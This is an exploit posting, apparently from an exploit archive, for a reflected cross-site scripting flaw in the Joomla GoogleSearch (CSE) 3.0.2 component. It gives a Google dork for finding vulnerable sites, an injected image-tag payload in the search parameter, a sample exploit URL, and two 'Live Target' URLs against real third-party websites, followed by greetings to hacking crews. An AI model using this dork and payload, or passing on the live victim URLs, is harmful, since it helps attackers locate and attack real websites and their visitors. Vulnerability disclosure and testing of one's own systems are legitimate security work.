Home / os / winmobile

Joomla GoogleSearch (CSE) 3.0.2 Cross Site Scripting

Posted on 01 September 2015

######################################################################################## #Exploit title: Joomla Component GoogleSearch (CSE) 3.0.2 - XSS Vulnerability #Author: Bet0 #Twitter: https://twitter.com/Bet0_Shinoda #Website: www.mc-crew.or.id #Google Dork: inurl:"index.php?option=com_googlesearch_cse" #Date: 29 Agustus 2015 #Vendor Homepage: www.kksou.com #Plugins Link: http://extensions.joomla.org/extensions/7023/details #Tested on: Mozila Firefox 40.0 and Ubuntu 15.04 ######################################################################################## [+]Piye om Carane (PoC) 1. Go to Columns Search Input The malicious code "><img src=x onerror=prompt(1)> [+]Sample http://127.0.0.1/index.php?option=com_googlesearch_cse&n=30&Itemid=97&cx=005488517870211354079%3Ao9aiibgwgqs&cof=FORID%3A11&ie=ISO-8859-1&q="><img src=x onerror=prompt(1)>&sa=Search&hl=en&safe=active&siteurl=https%3A%2F%2Fwww.google.com [+]Live Target http://ufoforce.com/index.php?option=com_googlesearch_cse&n=30&Itemid=97&cx=005488517870211354079%3Ao9aiibgwgqs&cof=FORID%3A11&ie=ISO-8859-1&q=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3E&sa=Search&hl=en&safe=active&siteurl=https%3A%2F%2Fwww.google.com http://www.linuxcnc.org/index.php?option=com_googlesearch_cse&n=30&Itemid=&cx=017093687396734519753%3Ao_92rwvgxxw&cof=FORID%3A9&ie=ISO-8859-1&q=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3E&sa=Search&hl=en&siteurl=http%3A%2F%2Fwww.linuxcnc.org%2F [+]Matur Suwun: #Dek Cia :* kapan kita balikan maneh dek :'( kangen aku karo awakmu #Ch0c01d, valcr00t, xr0b0tx, Don Tukulesto, rm -rf, vyc0d, Mr.Doel, Zen Rooney, nemesis, ArrchID *Gae Kabeh Ojo lali Ndang Rabi, moso kalah ambe mas blie :)) * #All member NyongDIE, Malang Cyber Crew, Indonesian Coder, Sund4nyM0uz Corporation, Explore Crew, HN-Community

 

TOP